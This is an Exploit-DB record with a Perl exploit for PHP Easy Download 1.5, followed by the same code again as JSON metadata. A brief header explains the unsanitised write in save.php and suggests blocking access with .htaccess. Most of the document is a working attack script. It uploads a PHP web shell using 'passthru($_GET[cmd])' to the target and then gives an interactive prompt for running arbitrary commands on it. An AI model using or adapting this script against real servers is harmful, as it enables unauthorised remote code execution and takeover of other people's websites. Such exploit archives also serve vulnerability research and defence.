ID EDB-ID:2812
Type exploitdb
Reporter nuffsaid
Modified 2006-11-18T00:00:00
Description
PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit. Webapps exploit for php platform
#!/usr/bin/perl
# +-------------------------------------------------------------------------------------------
# + PHP Easy Download <= 1.5 Remote Code Execution Vulnerability
# +-------------------------------------------------------------------------------------------
# + Affected Software .: PHP Easy Download <= 1.5
# + Vendor ............: http://www.ironclad.net/
# + Download ..........: http://ironclad.net/scripts/PHP_Easy_Download.zip
# + Description .......: "PHP Easy Download is an easy to use and convenient download script"
# + Dork ..............: "PHP Easy Downloader"
# + Class .............: Remote Code Execution
# + Risk ..............: High (Remote Code Execution)
# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
# +-------------------------------------------------------------------------------------------
# + Details:
# + PHP Easy Download by default installation doesn't prevent any of the files in the
# + file_info/admin directory from being accessed by a client. The file_info/admin/save.php
# + file takes input passed to the script by $_POST and writes it to $_POST["filename"].0
# + unsanatized in the file_info/admin/descriptions directory.
# +
# + Vulnerable Code:
# + file_info/admin/save.php, line(s) 14-36:
# + -> 14: $filename = $_POST["filename"];
# + -> 15: $description = $_POST["description"];
# + -> 20: $path = "../descriptions/$filename.0";
# + -> 30: $content = "$accesses|$description|$moreinfo|$date";
# + -> 34: $newfile = fopen($path,"w");
# + -> 35: fwrite($newfile, $content);
# + -> 36: fclose($newfile);
# +
# + Solution:
# + Prevent users from accessing any of the files in the file_info directory (htaccess).
# +-------------------------------------------------------------------------------------------
use Getopt::Long;
use URI::Escape;
use IO::Socket;
$code = "<?php passthru(\$_GET[cmd]); ?>";
main();
sub usage
{
print "\nPHP Easy Download <= 1.5 Remote Code Execution Exploit\n";
print "-h, --host\ttarget host\t(example.com)\n";
print "-f, --file\tshell file\t(shell.php)\n";
print "-d, --dir\tinstall dir\t(/file_info)\n";
exit;
}
sub main
{
GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s' => \$dir);
usage() unless $host;
$dir = "/file_info" unless $dir;
$file = "shell.php" unless $file;
uri_escape($cmd);
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "\nconnect() failed.\n";
print "\nconnected to ".$host.", sending data.\n";
$sendurl = "description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit";
$sendlen = length($sendurl);
print $sock "POST ".$dir."/admin/save.php HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "attempted to create php shell, server response:\n\n";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
while($cmd !~ "~quit")
{
print "\n\n-> ";
$cmd = <STDIN>;
if ($cmd !~ "~quit")
{
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "connect() failed.\n";
$sendurl = uri_escape($cmd);
print $sock "GET ".$dir."/descriptions/".$file.".0?cmd=".$sendurl." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
print "\n";
while($recvd = <$sock>)
{
print $recvd;
}
}
}
exit;
}
# milw0rm.com [2006-11-18]
{"id": "EDB-ID:2812", "hash": "6cc8bb696eb9ac669978a463736bd4cb", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Easy Downloader <= 1.5 save.php Remote Code Execution Exploit", "description": "PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit. Webapps exploit for php platform", "published": "2006-11-18T00:00:00", "modified": "2006-11-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/2812/", "reporter": "nuffsaid", "references": [], "cvelist": [], "lastseen": "2016-01-31T17:05:36", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-01-31T17:05:36"}, "vulnersScore": 6.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2812/", "sourceData": "#!/usr/bin/perl\n# +-------------------------------------------------------------------------------------------\n# + PHP Easy Download <= 1.5 Remote Code Execution Vulnerability\n# +-------------------------------------------------------------------------------------------\n# + Affected Software .: PHP Easy Download <= 1.5\n# + Vendor ............: http://www.ironclad.net/\n# + Download ..........: http://ironclad.net/scripts/PHP_Easy_Download.zip\n# + Description .......: \"PHP Easy Download is an easy to use and convenient download script\"\n# + Dork ..............: \"PHP Easy Downloader\"\n# + Class .............: Remote Code Execution\n# + Risk ..............: High (Remote Code Execution)\n# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>\n# +-------------------------------------------------------------------------------------------\n# + Details:\n# + PHP Easy Download by default installation doesn't prevent any of the files in the\n# + file_info/admin directory from being accessed by a client. The file_info/admin/save.php\n# + file takes input passed to the script by $_POST and writes it to $_POST[\"filename\"].0\n# + unsanatized in the file_info/admin/descriptions directory.\n# +\n# + Vulnerable Code: \n# + file_info/admin/save.php, line(s) 14-36:\n# + -> 14: $filename = $_POST[\"filename\"];\n# + -> 15: $description = $_POST[\"description\"];\n# + -> 20: $path = \"../descriptions/$filename.0\";\n# + -> 30: $content = \"$accesses|$description|$moreinfo|$date\";\n# + -> 34: $newfile = fopen($path,\"w\");\n# + -> 35: fwrite($newfile, $content);\n# + -> 36: fclose($newfile);\n# + \n# + Solution:\n# + Prevent users from accessing any of the files in the file_info directory (htaccess).\n# +-------------------------------------------------------------------------------------------\n\nuse Getopt::Long;\nuse URI::Escape;\nuse IO::Socket;\n\n$code = \"<?php passthru(\\$_GET[cmd]); ?>\";\n\nmain();\n\nsub usage\n{\n print \"\\nPHP Easy Download <= 1.5 Remote Code Execution Exploit\\n\";\n print \"-h, --host\\ttarget host\\t(example.com)\\n\";\n print \"-f, --file\\tshell file\\t(shell.php)\\n\";\n print \"-d, --dir\\tinstall dir\\t(/file_info)\\n\";\n exit;\n}\n\nsub main\n{\n GetOptions ('h|host=s' => \\$host,'f|file=s' => \\$file,'d|dir=s' => \\$dir);\n usage() unless $host;\n \n $dir = \"/file_info\" unless $dir;\n $file = \"shell.php\" unless $file;\n uri_escape($cmd);\n $sock = IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$host\",PeerPort=>\"80\")\n or die \"\\nconnect() failed.\\n\";\n \n print \"\\nconnected to \".$host.\", sending data.\\n\";\n $sendurl = \"description=0&moreinfo=\".$code.\"&accesses=0&filename=\".$file.\"&date=&B1=Submit\";\n $sendlen = length($sendurl);\n print $sock \"POST \".$dir.\"/admin/save.php HTTP/1.1\\n\";\n print $sock \"Host: \".$host.\"\\n\";\n print $sock \"Connection: close\\n\";\n print $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n print $sock \"Content-Length: \".$sendlen.\"\\n\\n\";\n print $sock $sendurl;\n print \"attempted to create php shell, server response:\\n\\n\";\n while($recvd = <$sock>)\n {\n print \" \".$recvd.\"\";\n }\n \n while($cmd !~ \"~quit\")\n {\n print \"\\n\\n-> \";\n $cmd = <STDIN>;\n if ($cmd !~ \"~quit\")\n {\n $sock = IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$host\",PeerPort=>\"80\")\n or die \"connect() failed.\\n\";\n $sendurl = uri_escape($cmd);\n \n print $sock \"GET \".$dir.\"/descriptions/\".$file.\".0?cmd=\".$sendurl.\" HTTP/1.1\\n\";\n print $sock \"Host: \".$host.\"\\n\";\n print $sock \"Accept: */*\\n\";\n print $sock \"Connection: close\\n\\n\";\n print \"\\n\";\n \n while($recvd = <$sock>)\n {\n print $recvd;\n }\n }\n }\n exit;\n}\n\n# milw0rm.com [2006-11-18]\n", "osvdbidlist": ["30525"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}